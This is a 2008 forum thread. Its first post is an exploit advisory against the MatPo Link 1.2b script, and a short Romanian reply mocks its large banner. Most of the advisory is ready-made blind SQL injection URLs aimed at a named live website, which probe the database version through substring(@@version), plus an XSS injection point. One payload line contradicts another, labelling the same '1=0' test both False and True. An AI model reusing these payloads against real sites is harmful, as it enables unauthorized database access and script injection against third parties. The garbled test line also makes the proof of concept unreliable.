Raven Posted November 7, 2008 Report Posted November 7, 2008 ########################################################################### ______ __ __ ______ __ ______ / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ /____/ EgY Coders Vulnerability Research TM # [~] Discovered by : Hakxer# [~] Type Gap : Blind Sql inj / XSS# [~] Script :MatPo Link 1.2b# [~] Greetz : Allah , Egyptian x hacker , Br1ght D@rk ##########################################################################|| Blind Sql Inj || POC: http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+[BSQL] Exploit : http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 False http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 True http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=5 True http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=4 False|| Cross Site Scripting ||Poc:http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=[XSS]Exploithttp://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=# Proud To be a Muslim ##_=END=_# Quote
dblackshell Posted November 9, 2008 Report Posted November 9, 2008 tot timpul cand dadeam peste un exploit/0day ma intrebam la ce naiba baga un "banner" imens... sa lase si ei un link si gata... fac dintr-un sql injection asa un big deal... a luat mai mult timp creearea fisierului decat exploatarea vulnerabilitatii... Quote